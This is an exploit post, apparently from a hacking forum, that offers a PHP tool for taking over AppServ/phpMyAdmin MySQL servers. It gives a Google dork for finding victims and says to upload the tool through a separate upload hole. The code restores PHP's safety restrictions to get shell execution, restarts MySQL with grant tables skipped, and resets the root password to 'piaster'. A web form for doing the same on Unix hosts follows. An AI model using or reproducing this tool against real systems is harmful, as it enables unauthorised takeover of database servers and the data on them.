[align=LEFT]
[/align]
کد:
# Exploit Title: [phpMyAdmin Root Password] # Date: [21/6/2011] # Home: 1337day.com # Author: [Piaster (wadelamin)] # phpmyadmin: Software Link: [www.appservnetwork.com ||www.phpmyadmin.net] # Version: [all phpmyadmin Version] # Category:: [remote, local] # Google dork: [inurl:phpMyAdmin || The AppServ Open Project - [all Version] for Windows ] # Tested on: [Windows & unix] # E-mail: [email protected] # Page: http://www.facebook.com/Pias.Piaster File Bug: //-----------------C:\AppServ\MySQL\scripts/resetpwd.php----------------// echo "Welcome to AppServ MySQL Root Password Reset Program\n\n"; AppServCMD(); function AppServCMD() { define('STDIN',fopen("php://stdin","r")); echo " Enter New Password : "; $input = trim(fgets(STDIN,256)); $input = ereg_replace('\"', "\\\"", $input); $input = ereg_replace('\'', "\'", $input); echo "\n Please wait ...................................\n\n"; exec ("net stop mysql"); exec ('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root'); //You can add a password and then request the file via the browser exec ("C:\[AppServ]\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('[root pwd]') where user = 'root';\""); exec ("C:\[AppServ]\MySQL\bin\mysqladmin -u root shutdown"); sleep(3); exec ("net start mysql"); } //--------------------------------END-----------------------------------// I've modified the file and then request the file from abroad But first there must be a upload exploit on server so they can upload the tool like any other tool or Shell Script And then request the file via the browser There Important Note: If the Windows server can access phpMyAdmin immediately if the file to complete the process this means that it is restarted the Mysql and then change the password. //---------------------------------Exploit the vulnerability tool------------------------// <? echo "<style type='text/css'>* { margin: 0; padding: 0; }A {color:#ffffff;text-decoration:none;}A:hover {color:yellow;text-decoration:underline;}body,table { font-family:verdana;font-size:11px;color:white;background-color:#993333; }.table5 { font-family:verdana;font-size:11px;color:white;background-color:black; }table { width:30%; }table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }input{ color:#000000;border:2px solid #666666; }.barheader,.mainpaneltable,td { border:1px solid #333333; }.input{ border:2px gold;margin:0; }input[type='submit'] { border:1px solid black; } input[type='text'] { padding:5px;}input[type='button'] { background-color:gold; }.select,option,input[type='button']:hover { background-color:red; }input[type='submit'] { background-color:orange }.select,option,input[type='submit']:hover { background-color:red; }input,input[type='text']:hover { background-color:#AF2C07; }textarea,.mainpanel input,select,option { background-color:orange; }</style>";echo "<head><title>PiAsTeR VS phpMyAdmin</title><div style=\"background: orange;\"><p align=\"center\"><font size=\"2\" <h1><font color = red><b>PiAsTeR</font> VS <font color = red>phpMyAdmin</font></h1></b></p><hr color=\"black\"</div></div><center><BR>";$f = '<a href="http://www.facebook.com/Pias.Piaster" target="_blank">Facebook</a>'; @set_time_limit(0); @ini_restore("safe_mode"); @ini_restore("allow_url_fopen"); @ini_restore("open_basedir"); @ini_restore("disable_functions"); @ini_restore("safe_mode_exec_dir"); @ini_restore("safe_mode_include_dir"); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $win = strtolower(substr(PHP_OS,0,3)) == "win"; if(function_exists('exec')){$pias = exec;} elseif(function_exists('shell_exec')){$pias = shell_exec;} elseif(function_exists('system')) {$pias = system ;} elseif(function_exists('passthru')) { $pias = passthru ;} if($win) { define('STDIN',fopen("php://stdin","r")); $input = trim(fgets(STDIN,256)); $input = ereg_replace('\"', "\\\"", $input); $input = ereg_replace('\'', "\'", $input); echo "\n Please wait ...................................\n\nGoodluck ... <br>USER: root & PASSWORD: piaster"; $pias("net stop mysql"); $pias('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root'); $pias("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\""); $pias("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown"); sleep(3); $pias("net start mysql");} if(!$win) { echo '<br><br><br><form action="#" method="post"><p align="center"><table><tr><td>user<input name="dbu" size="20" value = ' . $_REQUEST['dbu'] . ' ><td>password<input name="dbp" size="20" value = ' . $_REQUEST['dbp'] . ' ><td>host<input name="dbh" size="20" value = ' . $_REQUEST['dbh'] . '></tr></table><input type="submit" value="GO" name = "pias" /> </p></form></td></tr><td><tr>'; if(isset($_REQUEST['pias'])){ $dbu = $_REQUEST['dbu']; $dbp = $_REQUEST['dbp']; $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost'; $conn = @mysql_connect($dbh, $dbu, $dbp); $select = @mysql_select_db('mysql', $conn); if (!$select) { echo @mysql_error();} $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';"; $go1 = @mysql_query( $t1 , $conn); if($go1){echo '<center><br>Goodluck ... Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster</center>';} else echo 'database mysql not acsses or not found ty agin';}} echo '<br><br>By Piaster :: [email protected] :: '. $f ; ?>